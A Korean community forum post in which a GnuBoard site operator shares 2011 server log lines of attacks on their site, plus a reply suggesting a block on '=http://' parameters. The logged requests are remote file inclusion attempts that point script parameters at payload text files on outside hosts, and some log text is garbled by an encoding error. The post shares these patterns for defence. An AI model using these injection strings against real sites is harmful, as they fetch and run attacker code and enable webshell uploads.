사이트 로그로 알아본 해커들 공격 유형 > 자유게시판

매뉴얼 FAQ
그누보드5
데모
자료실
  • 다운로드
  • 매뉴얼
  • Q&A
    • 창작마당
  • 팁자료실
  • 스킨
  • 빌더
  • 테마
  • 플러그인
  • 사용후기
    • 영카트5
    데모
    자료실
    창작마당
    정기결제
    데모
    자료실
    Q & A
    궁금한 게 있으신가요? 지금 질문해보세요!
    솔루션
    프로그래밍
    서버
    사이트운영
    컨텐츠몰
    나의 재능을 팔아보세요!
    부가서비스
    국내최저! 신용카드 결제수수료 2.85%
    제작의뢰
    커뮤니티
    커뮤니티
    소모임
    스터디
    AI 🌟
    강좌
    기타

    자유게시판

    출석체크 십년전오늘 포인트가위바위보 포인트야구게임

    사이트 로그로 알아본 해커들 공격 유형 정보

    사이트 로그로 알아본 해커들 공격 유형

    본문

    트래픽 로그 + 스킨게시판 에러 로그로 조사해봣습니다.
    어디서 뻥뻥 뚫려 웹셀이 업로드 된지는 확실히 못알아냈는데..
    (로그가 하루에 1GB가 쌓여서 거의 분석이 불가능할 지경..)

    그누보드 보안에 혹시나 참고가 될까 해서 올려봅니다. (중복 로그 제외)

    205.209.97.120 - - [18/Mar/2011:12:05:00 +0900] "GET ///delete_all.php?board_skin_path=http://www.housevampyr.com/depot/catalog/images/hewlett_packard/id.txt

    67.192.170.65 - - [18/Mar/2011:11:44:47 +0900] "GET /main/bbs//delete_comment.php?board_skin_path=http://www.genednetwork.or.th/introduce//pic_files/id1.txt? HTTP/1.1" 200 25

    74.50.5.221 - - [18/Mar/2011:13:53:15 +0900] "GET ///?_SERVER[DOCUMENT_ROOT]=http://smash2.fileave.com/zfxid1.txt???

    74.50.5.221 - - [18/Mar/2011:14:03:31 +0900] "GET /main/counter.php///?_zb_path=http://smash2.fileave.com/zfxid1.txt??? HTTP/1.1" 200 144

    67.192.170.65 - - [18/Mar/2011:23:21:51 +0900] "GET /main/bbs///skin/happycast_category_lightblack/login.php?dir=http://www.genednetwork.or.th/introduce//pic_files/id1.txt? HTTP/1.1" 404 313

    143.248.72.202 - - [18/Mar/2011:23:33:11 +0900] "GET /main/bbs//skin/ggambo5100_board/setup.php?setup[use_category]=1&dir=http://www.genednetwork.or.th/introduce//pic_files/id1.txt? HTTP/1.1" 404 299

    query 110313 122156 guest 94.136.63.119  /main//index.php?united=http://www.genednetwork.or.th/introduce//pic_files/id1.txt? 

    query 110314 035424 guest 66.249.67.135  /main/bbs/board.php?bo_table=politic&sca=占쎄퀣占쏙옙>
    ++++++++
    ++++++++++++?쒕ぉ
    ++++++++++++?댁슜
    ++++++++++++?쒕ぉ+?댁슜
    ++++++++++++++++++++++++?뚯썝?꾩씠??/option>
    ++++++++++++?뚯썝?꾩씠??肄?
    ++++++++++++?대쫫
    ++++++++++++?대쫫(肄?
    ++++++++++++++++++++
    ++++++++
    ++++++++
    ++++++++++++?쒕ぉ
    ++++++++++++?댁슜
    ++++++++++++?쒕ぉ+?댁슜
    ++++++++++++++++++++++++?뚯썝?꾩씠??/option>
    ++++++++++++?뚯썝?꾩씠??肄?
    ++++++++++++?대쫫
    ++++++++++++?대쫫(肄?
    ++++++++++++++++++++
    ++++++++
    query 110314 070317 guest 91.201.66.154  
    /main/bbs/board.php?bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1++GET+http://agal.co.kr/main/bbs/board.php?bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1+[0,80162,119458]+-> bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1++GET+http://agal.co.kr/main/bbs/board.php?bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1+[0,80162,119458]+->


    추천
    0

    댓글 3개

    로빈아빠 홈페이지 자기소개 아이디로 검색 회원게시물
    (114.♡.♡.213)
    11.03.20 08:49:59
    =http:// 로 들어오는 모든 접근은 막으시면 되구요. sca 로 들어오는것은 검색어 조회수를 올리기 위한 접근입니다. 제가 올린 해킹관련 extend 파일을 넣어두시면 관련 부분은 우선 차단됩니다.
    전체 199,647 |RSS
    자유게시판 내용 검색
    출석체크 십년전오늘 포인트가위바위보 포인트야구게임

    회원로그인

    진행중 포인트경매

    1. 포인트 경매!
      직접 등록해보세요!
    (주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1402호 / E-Mail: admin@sir.kr
    사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
    © SIRSOFT